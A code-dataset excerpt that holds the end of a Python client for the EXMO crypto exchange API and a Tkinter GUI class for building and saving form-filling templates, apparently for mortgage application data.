headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def payments_providers_crypto_list(self) -> dict:\r\n '''\r\n Возвращает список крипто провайдеров биржи\r\n '''\r\n\r\n url = \"https://api.exmo.com/v1.1/payments/providers/crypto/list\"\r\n\r\n payload={}\r\n headers = {}\r\n\r\n response = requests.request(\"GET\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def user_info (self) -> dict:\r\n\r\n url = 'https://api.exmo.com/v1.1/user_info'\r\n\r\n payload = dict()\r\n\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n \r\n response = requests.request('POST', url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def order_create(self, base, quote, type, quantity, price = 0) -> dict :\r\n url = 'https://api.exmo.com/v1.1/order_create'\r\n\r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n quantity = f'{quantity}',\r\n type = f'{type}',\r\n price = f'{price}'\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n \r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def open_orders (self) -> dict:\r\n\r\n '''\r\n Возвращает текущие открытые ордера\r\n ''' \r\n url = 'https://api.exmo.com/v1.1/user_open_orders'\r\n\r\n pair:tuple = self.pair_settings().keys()\r\n pair = ','.join(pair)\r\n payload = dict (\r\n pair = pair\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n return response.json()\r\n\r\n def cancel_order (self, id) -> dict:\r\n url = 'https://api.exmo.com/v1.1/order_cancel'\r\n\r\n payload = dict(\r\n order_id = f'{id}'\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n return response.json()","repo_name":"OGKuz/EXMO_LIGHT_CLIENT","sub_path":"drivers.py","file_name":"drivers.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20197810163","text":"from dataclasses import field\nfrom pickle import NONE\nimport tkinter as tk\nfrom tkinter import LabelFrame, ttk\nfrom tkinter import messagebox\nfrom turtle import left\nfrom numpy import imag\n\nfrom setuptools import Command\nimport GenerateConfig as Gc\nimport json,io,os\nimport fontawesome as fa\nfrom ttkthemes import ThemedStyle\nimport time\n\n\nclass AddTemplate:\n config=None \n ContainerFrame=None \n displayFont = ( \"Verdana\", 10)\n combostyle=None\n treeViewStyle=None\n varAllTemlate,varAllTemlateName,varCurrentTemplate,varAllSection,varCurrentSection,varAllAction=[],[],None,[],None,[] \n IsUpdateSection,IsUpdateAction,treev2_selected_items,treev2_selected_index=False,False,None,-1\n \n varActionType= None \n varCurrentTemplateName=None\n varCurrentUrl=None\n \n\n chdFrm1,chdFrm2=None,None\n var_allSectionName,var_allSectionType,var_allSectionCategory,var_allSectionCategoryType,var_allSelectorType, var_allActionType,var_allInputType,var_allConditionType=None,None,None,None,None, None,None,None\n \n var_sectionName,var_sectionType,var_sectionCategory=None,None,None\n var_actionId,var_actionType,var_controlSelectorType,var_control,var_inputType,var_manualValue,var_ioValue,var_nextActionId,var_ActionStartupType,var_conditionType,var_leftInputType,var_leftManualValue,var_leftIOValue,var_rightInputType,var_rightManualValue,var_rightIOValue,var_trueActionId,var_falseActionId=None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None\n\n treev1,treev2=None,None;\n\n var_0_FunctionName,var_0_SectionName,var_0_KeyName=None,None,None\n var_1_FunctionName,var_1_SectionName,var_1_KeyName=None,None,None\n var_2_FunctionName,var_2_SectionName,var_2_KeyName=None,None,None\n val_AllFunctionName,AllKeyName1,AllKeyName2,AllKeyName3=[],[],[],[]\n\n def __init__(self,Container,config):\n self.config=config \n self.varActionType= tk.StringVar() \n self.varCurrentTemplateName= tk.StringVar()\n self.varCurrentUrl= tk.StringVar() \n self.ContainerFrame=Container \n self.LoadFromConfig() \n self.fncCreateItems()\n \n def LoadFromConfig(self):\n self.var_allSectionName,self.var_allSectionType,self.var_allSectionCategory,self.var_allSectionCategoryType,self.var_allSelectorType, self.var_allActionType,self.var_allInputType,self.var_allConditionType=self.config.SectionNames,self.config.SectionType,self.config.SectionCategory,self.config.SectionCategoryType,self.config.SelectorType,self.config.ActionTypes,self.config.InputType,self.config.ConditionType\n self.var_actionId,self.var_actionType,self.var_controlSelectorType,self.var_control,self.var_inputType,self.var_manualValue,self.var_ioValue,self.var_nextActionId,self.var_ActionStartupType,self.var_conditionType,self.var_leftInputType,self.var_leftManualValue,self.var_leftIOValue,self.var_rightInputType,self.var_rightManualValue,self.var_rightIOValue,self.var_trueActionId,self.var_falseActionId = tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.var_sectionName,self.var_sectionType,self.var_sectionCategory=tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.var_0_FunctionName,self.var_0_SectionName,self.var_0_KeyName,self.var_1_FunctionName,self.var_1_SectionName,self.var_1_KeyName,self.var_2_FunctionName,self.var_2_SectionName,self.var_2_KeyName=tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.val_AllFunctionName=self.config.CustomFunction\n self.var_actionType.set(\"Fill Input\")\n self.var_ActionStartupType.set(\"Middle\")\n self.LoadAllJsonData()\n \n \n def fncChangeTemplateType(self,event):\n if(self.varActionType.get()==\"Add Template\"):\n self.frmHeader.children[\"cmbTemplateName\"].grid_forget()\n self.frmHeader.children[\"txtTemplateName\"].grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W) \n self.varCurrentTemplate=None\n self.varCurrentSection=None\n elif(self.varActionType.get()==\"Update Template\"):\n self.frmHeader.children[\"txtTemplateName\"].grid_forget()\n self.frmHeader.children[\"cmbTemplateName\"].grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n self.BindDropDownTemplateName()\n \n def LoadAllJsonData(self):\n try:\n if not os.path.exists(self.config.FilePath):\n os.makedirs(self.config.FilePath) \n if os.path.isfile(os.path.join(self.config.FilePath, self.config.TemplateFileName)) is False:\n with io.open(os.path.join(self.config.FilePath, self.config.TemplateFileName), 'w') as fp:\n print('Empty File Created')\n else:\n with io.open(os.path.join(self.config.FilePath, self.config.TemplateFileName)) as fp:\n self.varAllTemlate=[]\n self.varAllTemlate = json.load(fp)\n self.varAllTemlateName=[]\n for x in self.varAllTemlate:\n self.varAllTemlateName.append(x[\"templateName\"])\n except Exception as ex:\n messagebox.showerror(\"Error\", ex)\n\n \n def BindDropDownTemplateName(self ):\n self.LoadAllJsonData()\n if(self.checkKey(self.frmHeader.children,\"cmbTemplateName\")):\n self.frmHeader.children[\"cmbTemplateName\"].configure(values=self.varAllTemlateName)\n\n def checkKey(self,dict, key): \n if key in dict.keys():\n return True\n else:\n return False\n\n def BindKeyName(self,procType=1,IsSectionDropDown=False): \n concatString=\"\"\n if(procType==1):\n if(self.var_0_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_0_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_0_SectionName.get()) \n self.chdFrm1.children[\"frmchdFrm1_1\"].children[\"var_0_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_0_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_0_FunctionName.get()\n concatString= concatString+self.var_0_SectionName.get()\n if(self.GetSectiontype(self.var_0_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+str(self.var_0_KeyName.get()).replace(' ','_')\n self.var_ioValue.set(concatString)\n if(procType==2):\n if(self.var_1_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_1_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_1_SectionName.get()) \n self.chdFrm2.children[\"frmchdFrm2_1\"].children[\"var_1_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_1_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_1_FunctionName.get()\n concatString= concatString+self.var_1_SectionName.get()\n if(self.GetSectiontype(self.var_1_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+ str(self.var_1_KeyName.get()).replace(' ','_') \n self.var_leftIOValue.set(concatString)\n if(procType==3):\n if(self.var_2_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_2_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_2_SectionName.get()) \n self.chdFrm2.children[\"frmchdFrm2_2\"].children[\"var_2_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_2_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_2_FunctionName.get()\n concatString= concatString+self.var_2_SectionName.get()\n if(self.GetSectiontype(self.var_2_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+str(self.var_2_KeyName.get()).replace(' ','_') \n self.var_rightIOValue.set(concatString)\n\n \n\n def BindAllKeyName(self,sectionName): \n all_key=[]\n \"Liabilities\",\"Expenditure\",\"ExistingMortgage\",\"MortgageRequirements\"\n if(sectionName==\"PersonalDetails\"):\n all_key=self.config.IO_Name_PersonalDetails\n elif(sectionName==\"CurrentAddress\"):\n all_key=self.config.IO_Name_CurrentAddress\n elif(sectionName==\"PreviousAddress\"):\n all_key=self.config.IO_Name_PreviousAddress\n elif(sectionName==\"ContactDetails\"):\n all_key=self.config.IO_Name_ContactDetails\n elif(sectionName==\"ProfessionalContacts\"):\n all_key=self.config.IO_Name_ProfessionalContacts\n elif(sectionName==\"BankAccount\"):\n all_key=self.config.IO_Name_BankAccountDetails\n elif(sectionName==\"FamilyAndDependants\"):\n all_key=self.config.IO_Name_FamilyAndDependants\n elif(sectionName==\"IDVerification\"):\n all_key=self.config.IO_Name_IDVerification\n elif(sectionName==\"CurrentEmploymentDetails\"):\n all_key=self.config.IO_Name_CurrentEmploymentDetails\n elif(sectionName==\"Assets\"):\n all_key=self.config.IO_Name_Assets\n elif(sectionName==\"Liabilities\"):\n all_key=self.config.IO_Name_Liabilities\n elif(sectionName==\"Expenditure\"):\n all_key=self.config.IO_Name_Expenditure1\n elif(sectionName==\"ExistingMortgage\"):\n all_key=self.config.IO_Name_ExistingMortgage\n elif(sectionName==\"MortgageRequirements\"):\n all_key=self.config.IO_Name_MortgageRequirements\n for i ,x in enumerate(all_key):\n if(str(x).find(\"[M]\") !=-1 or str(x).find(\"[D]\") !=-1 ):\n all_key[i]=str(x).replace(\"[M]\",\"\").replace(\"[D]\",\"\") \n return all_key\n\n def BindExistingTreeview(self,event,procType=1):\n if(procType==1):\n self.varCurrentTemplate=None \n self.var_allSectionName=[]\n self.clear_all_gridview(procType) \n for template in self.varAllTemlate:\n if template[\"templateName\"]==self.varCurrentTemplateName.get():\n self.varCurrentTemplate=template\n if(self.varCurrentTemplate != None):\n self.varCurrentUrl.set(self.varCurrentTemplate[\"url\"])\n for sections in self.varCurrentTemplate[\"sections\"]: \n sectionName,sectionType,sectionCategory,actionCount='','','',0\n if(self.checkKey(sections,\"sectionName\")):\n sectionName=sections[\"sectionName\"]\n if(self.checkKey(sections,\"sectionType\")):\n sectionType=sections[\"sectionType\"]\n if(self.checkKey(sections,\"sectionCategory\")):\n sectionCategory=sections[\"sectionCategory\"]\n if(self.checkKey(sections,\"actions\")):\n actionCount=len(sections[\"actions\"]) \n self.treev1.insert(\"\", 'end',values =(sectionName, sectionType,sectionCategory,actionCount))\n self.var_allSectionName.append(sectionName)\n elif(procType==2):\n self.varCurrentSection=None \n self.clear_all_gridview(procType) \n if(not self.checkKey(self.varCurrentTemplate,\"sections\")): \n return\n for sections in self.varCurrentTemplate[\"sections\"]: \n if sections[\"sectionName\"]==self.var_sectionName.get():\n self.varCurrentSection=sections\n if(self.varCurrentSection != None):\n if( self.checkKey(self.varCurrentSection,\"sectionCategory\")) :\n self.var_sectionCategory.set(self.varCurrentSection[\"sectionCategory\"])\n if( self.checkKey(self.varCurrentSection,\"sectionType\")) :\n self.var_sectionType.set(self.varCurrentSection[\"sectionType\"])\n for actions in self.varCurrentSection[\"actions\"]: \n ActionId,ActionType,StartupType,SelectorType,Control_,InputType,ManualValue,IOValue,NextActionId='','','','','','','','',''\n conditionType,leftInputType,leftManualValue,leftIOValue,trueActionId,rightInputType,rightManualValue,rightIOValue,falseActionId='','','','','','','','',''\n if(self.checkKey(actions,\"actionId\")):\n ActionId=actions[\"actionId\"]\n if(self.checkKey(actions,\"actionType\")):\n ActionType=actions[\"actionType\"]\n if(self.checkKey(actions,\"startupType\")):\n StartupType=actions[\"startupType\"]\n if(self.checkKey(actions,\"selectorType\")):\n SelectorType=actions[\"selectorType\"]\n if(self.checkKey(actions,\"control\")):\n Control_=actions[\"control\"]\n if(self.checkKey(actions,\"inputType\")):\n InputType=actions[\"inputType\"]\n if(self.checkKey(actions,\"manualValue\")):\n ManualValue=actions[\"manualValue\"]\n if(self.checkKey(actions,\"ioValue\")):\n IOValue=actions[\"ioValue\"]\n if(self.checkKey(actions,\"nextActionId\")):\n NextActionId=actions[\"nextActionId\"]\n\n if(self.checkKey(actions,\"conditionType\")):\n conditionType=actions[\"conditionType\"]\n if(self.checkKey(actions,\"leftInputType\")):\n leftInputType=actions[\"leftInputType\"]\n if(self.checkKey(actions,\"leftManualValue\")):\n leftManualValue=actions[\"leftManualValue\"]\n if(self.checkKey(actions,\"leftIOValue\")):\n leftIOValue=actions[\"leftIOValue\"]\n if(self.checkKey(actions,\"trueActionId\")):\n trueActionId=actions[\"trueActionId\"]\n if(self.checkKey(actions,\"rightInputType\")):\n rightInputType=actions[\"rightInputType\"]\n if(self.checkKey(actions,\"rightManualValue\")):\n rightManualValue=actions[\"rightManualValue\"]\n if(self.checkKey(actions,\"rightIOValue\")):\n rightIOValue=actions[\"rightIOValue\"]\n if(self.checkKey(actions,\"falseActionId\")):\n falseActionId=actions[\"falseActionId\"]\n\n \n self.treev2.insert(\"\", 'end',values =(ActionId,ActionType,StartupType,SelectorType,Control_,InputType,ManualValue,IOValue,NextActionId,\n conditionType,leftInputType,leftManualValue,leftIOValue,trueActionId,rightInputType,rightManualValue,rightIOValue,falseActionId))\n self.treev2.pack_forget()\n self.treev2.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n \n def BindSectionType(self,event):\n self.var_sectionType.set(self.GetSectiontype(self.var_sectionCategory.get())) \n \n def GetSectiontype(self,selctionName):\n for i ,x in enumerate(self.var_allSectionCategory):\n if(x==selctionName):\n return self.var_allSectionCategoryType[i]\n\n def clear_all_gridview(self,ProcType=1):\n if(ProcType==1):\n for item in self.treev1.get_children():\n self.treev1.delete(item)\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n elif(ProcType==2) :\n for item in self.treev2.get_children():\n self.treev2.delete(item) \n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n\n\n def fncCreateItems(self):\n self.varActionType.set(\"Add Template\")\n self.frmHeader = ttk.Frame(self.ContainerFrame) \n frmBody = ttk.Frame(self.ContainerFrame)\n self.ContainerFrame.grid_columnconfigure(0, weight=100)\n self.ContainerFrame.grid_rowconfigure(0, weight=1)\n self.ContainerFrame.grid_rowconfigure(1, weight=100)\n\n self.frmHeader.grid(row=0,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n frmBody.grid(row=1,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n\n self.frmHeader.columnconfigure(0, weight=1)\n self.frmHeader.columnconfigure(1, weight=1)\n self.frmHeader.columnconfigure(2, weight=1)\n self.frmHeader.columnconfigure(3, weight=100)\n self.frmHeader.rowconfigure(0, weight=1)\n self.frmHeader.rowconfigure(1, weight=1)\n self.frmHeader.rowconfigure(2, weight=1)\n self.frmHeader.rowconfigure(3, weight=100)\n\n ttk.Label(self.frmHeader,text = \"Type\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbType=ttk.Combobox(self.frmHeader,state=\"readonly\", width = 24, textvariable = self.varActionType, values=(\"Add Template\",\"Update Template\"))\n \n cmbType.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n\n ttk.Label(self.frmHeader,text = \"Template Name\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbAllTemplate=ttk.Combobox(self.frmHeader,name=\"cmbTemplateName\",state=\"readonly\", width = 24, textvariable = self.varCurrentTemplateName)\n ttk.Entry(self.frmHeader,name=\"txtTemplateName\",width = 26,textvariable = self.varCurrentTemplateName).grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n ttk.Label(self.frmHeader,text = \"Url\" ,font=self.displayFont).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.frmHeader,name=\"txtUrl\",textvariable =self.varCurrentUrl, width = 26).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n\n \n frmbtn = ttk.Frame(self.frmHeader) \n frmbtn.grid(row=0,column = 2, rowspan=3, sticky=tk.N+tk.S+tk.W)\n btnSave = ttk.Button( frmbtn, text =\"Save\", width=10,command =lambda: self.fncSaveData())\n btnReset = ttk.Button ( frmbtn, text =\"Reset\", width=10,command =lambda: self.fncResetData())\n \n btnSave.grid(row=0,column = 0 , padx=(10,0),pady=(3,5)) \n btnReset.grid(row=1,column = 0, padx=(10,0),pady=(3,5))\n\n\n frmbtn1 = ttk.Frame(self.frmHeader,name=\"frmTreeviewhandler\") \n frmbtn1.grid(row=3,column = 1, columnspan=3, sticky=tk.N+tk.W+tk.E)\n btnAddAction = ttk.Button ( frmbtn1,name=\"btnAddAction\" , image=self.config.ico_add ,command =lambda: self.fncOpenChildForm(False) ) \n btnEditAction = ttk.Button ( frmbtn1,name=\"btnEditAction\" , image=self.config.ico_edit , state=tk.DISABLED, command =lambda: self.fncOpenChildForm(True) ) \n btnRemoveAction = ttk.Button ( frmbtn1,name=\"btnRemoveAction\",image=self.config.ico_delete , state=tk.DISABLED,command =lambda: self.fncRemove() )\n btnMoveUpAction = ttk.Button ( frmbtn1,name=\"btnMoveUpAction\",image=self.config.ico_up , state=tk.DISABLED,command =lambda: self.fncMoveUp() )\n btnMoveDownAction = ttk.Button ( frmbtn1,name=\"btnMoveDownAction\",image=self.config.ico_down , state=tk.DISABLED,command =lambda: self.fncMoveDown() )\n btnAddAction.grid(row=0,column = 0, padx=(10,0),pady=(3,5))\n btnEditAction.grid(row=0,column = 1, padx=(10,0),pady=(3,5))\n btnRemoveAction.grid(row=0,column =2, padx=(10,0),pady=(3,5))\n btnMoveUpAction.grid(row=0,column =3, padx=(10,0),pady=(3,5))\n btnMoveDownAction.grid(row=0,column =4, padx=(10,0),pady=(3,5))\n\n self.treev1 = ttk.Treeview(frmBody, selectmode ='browse')\n # Constructing vertical scrollbar\n # with treeview\n verscrlbar = ttk.Scrollbar(frmBody,orient =\"vertical\",command = self.treev1.yview)\n horscrlbar = ttk.Scrollbar(frmBody,orient =\"horizontal\",command = self.treev1.xview)\n\n # Calling pack method w.r.to vertical\n # scrollbar\n verscrlbar.pack(side ='right', fill ='y')\n horscrlbar.pack(side ='bottom', fill ='x')\n self.treev1.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n # Configuring treeview\n self.treev1.configure(xscrollcommand = horscrlbar.set, yscrollcommand=verscrlbar.set)\n\n # Defining number of columns\n self.treev1[\"columns\"] = (\"sectionName\", \"sectionType\", \"sectionCategory\",\"actionCount\")\n # Defining heading\n self.treev1['show'] = 'headings'\n # Assigning the width and anchor to the\n # respective columns\n self.treev1.column(\"sectionName\", width = 50, anchor ='nw')\n self.treev1.column(\"sectionType\", width = 50, anchor ='nw')\n self.treev1.column(\"sectionCategory\", width = 50, anchor ='nw')\n self.treev1.column(\"actionCount\", width = 50, anchor ='center')\n \n # Assigning the heading names to the\n # respective columns\n self.treev1.heading(\"sectionName\", text =\"Section Name\")\n self.treev1.heading(\"sectionType\", text =\"Type\")\n self.treev1.heading(\"sectionCategory\", text =\"Category\")\n self.treev1.heading(\"actionCount\", text =\"Action Count\")\n \n self.treev1.bind(\"\",lambda event:self.fncMoveItems(event,1))\n cmbType.bind(\"<>\", lambda event:self.fncChangeTemplateType(event))\n cmbAllTemplate.bind(\"<>\",lambda event:self.BindExistingTreeview(event,1))\n\n def fnc_Select_Record(self,procType):\n if(procType==1):\n selected=self.treev1.focus() \n if(len(selected)>0):\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.NORMAL\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.NORMAL\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.NORMAL\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.NORMAL\n elif (procType==2):\n selected=self.treev2.focus() \n if(len(selected)>0): \n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.NORMAL\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.NORMAL\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.NORMAL\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.NORMAL\n\n\n def fncMoveItems(self,e,procType=1):\n self.fnc_Select_Record(procType)\n\n def fncMoveUp(self,procType=1):\n if(procType==1):\n rows=self.treev1.selection()\n for row in rows:\n self.treev1.move(row,self.treev1.parent(row),self.treev1.index(row)-1)\n elif(procType==2):\n rows=self.treev2.selection()\n for row in rows:\n self.treev2.move(row,self.treev2.parent(row),self.treev2.index(row)-1)\n\n def fncMoveDown(self,procType=1):\n if(procType==1):\n rows=self.treev1.selection()\n for row in reversed(rows):\n self.treev1.move(row,self.treev1.parent(row),self.treev1.index(row)+1)\n if(procType==2):\n rows=self.treev2.selection()\n for row in reversed(rows):\n self.treev2.move(row,self.treev2.parent(row),self.treev2.index(row)+1)\n\n def fncRemove(self,ProcType=1): \n if(ProcType==1):\n selected_items = self.treev1.selection() \n if(len(selected_items)==0):\n tk.messagebox.showerror(\"Error\", \"Select the section\")\n for selected_item in selected_items: \n self.treev1.delete(selected_item)\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n if(ProcType==2):\n selected_items = self.treev2.selection() \n if(len(selected_items)==0):\n tk.messagebox.showerror(\"Error\", \"Select the section\")\n for selected_item in selected_items: \n self.treev2.delete(selected_item)\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n\n def fncResetData(self):\n self.varActionType.set(\"Add Template\")\n self.varCurrentTemplateName.set(\"\") \n self.varCurrentUrl.set(\"\")\n self.clear_all_gridview()\n self.fncChangeTemplateType(None)\n self.BindDropDownTemplateName()\n \n def fncSaveData(self,ProcType=1):\n\n list_of_bool = [True for elem in self.varAllTemlate\n if self.varCurrentTemplateName.get() in elem[\"templateName\"]]\n tempSection=None\n self.varAllSection=[]\n \n if(self.varActionType.get()==\"Add Template\"):\n if any(list_of_bool):\n messagebox.showerror(\"Already Exists\", \"Template Name already exists\")\n return\n if(self.varActionType.get()==\"Update Template\"):\n if not any(list_of_bool):\n messagebox.showerror(\"Not Exists\", \"Invalid template name\")\n return\n self.varAllSection=self.varCurrentTemplate[\"sections\"]\n if(self.varCurrentUrl==None or self.varCurrentUrl.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required URL\")\n return\n\n if(ProcType==2):\n FoundSection=False\n if(self.var_sectionName==None or self.var_sectionName.get()==\"\"):\n messagebox.showerror(\"Required\", \"Section Section Name\")\n return\n for sections in self.varAllSection: \n if(self.checkKey(sections,\"sectionName\")):\n if(sections[\"sectionName\"]==self.var_sectionName.get()): \n FoundSection=True\n break\n if(self.IsUpdateSection and not FoundSection):\n messagebox.showerror(\"Required\", \"Invalid Section Name\")\n return\n if(not self.IsUpdateSection and FoundSection):\n messagebox.showerror(\"Required\", \"Section Name already Exists\")\n return\n if(self.var_sectionType==None or self.var_sectionType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Section Type\")\n return\n if(self.var_sectionCategory==None or self.var_sectionCategory.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Section Category\")\n return\n if(self.treev2==None):\n messagebox.showerror(\"Required\", \"Required Actions\")\n return\n AllAction=[]\n for item in self.treev2.get_children(): \n aDict = {\"actionId\": str(self.treev2.item(item)[\"values\"][0]) , \"actionType\":str(self.treev2.item(item)[\"values\"][1]) ,\n \"startupType\":str( self.treev2.item(item)[\"values\"][2]),\"selectorType\":str(self.treev2.item(item)[\"values\"][3]) ,\"control\":str( self.treev2.item(item)[\"values\"][4]),\n \"inputType\":str(self.treev2.item(item)[\"values\"][5]) ,\"manualValue\":str( self.treev2.item(item)[\"values\"][6]),\"ioValue\":str(self.treev2.item(item)[\"values\"][7]) ,\n \"nextActionId\":str(self.treev2.item(item)[\"values\"][8]) ,\"conditionType\": str(self.treev2.item(item)[\"values\"][9]) ,\"leftInputType\":str(self.treev2.item(item)[\"values\"][10]) ,\n \"leftManualValue\":str(self.treev2.item(item)[\"values\"][11]) ,\"leftIOValue\":str(self.treev2.item(item)[\"values\"][12]) ,\"trueActionId\":str(self.treev2.item(item)[\"values\"][13]) ,\n \"rightInputType\":str(self.treev2.item(item)[\"values\"][14]) ,\"rightManualValue\":str(self.treev2.item(item)[\"values\"][15]) ,\"rightIOValue\":str(self.treev2.item(item)[\"values\"][16]),\n \"falseActionId\": str(self.treev2.item(item)[\"values\"][17]) }\n AllAction.append(aDict)\n if(len(AllAction)==0):\n messagebox.showerror(\"Required\", \"Required Actions\")\n return\n tempSection={\"sectionName\":str( self.var_sectionName.get()),\"sectionCategory\":str(self.var_sectionCategory.get()) ,\n \"sectionType\":str( self.var_sectionType.get()),\"actions\":AllAction}\n \n\n if(self.IsUpdateSection):\n for index,sections in enumerate(self.varAllSection) : \n if(self.checkKey(sections,\"sectionName\")):\n if(sections[\"sectionName\"]==self.var_sectionName.get()): \n self.varAllSection[index]=tempSection\n else:\n if (self.varAllSection==None):\n self.varAllSection=[]\n self.varAllSection.append(tempSection)\n #add data in tree view\n self.treev1.insert(\"\", 'end',values =(self.var_sectionName.get(), str( self.var_sectionType.get()),str(self.var_sectionCategory.get()),len(AllAction)))\n if(len(self.varAllSection) ==0):\n messagebox.showerror(\"Required\", \"Required Section\")\n return\n\n AllData=None\n if(self.varActionType.get()==\"Add Template\"):\n AllData={\"templateName\":str(self.varCurrentTemplateName.get()) ,\"url\":str(self.varCurrentUrl.get()) ,\"sections\":self.varAllSection}\n 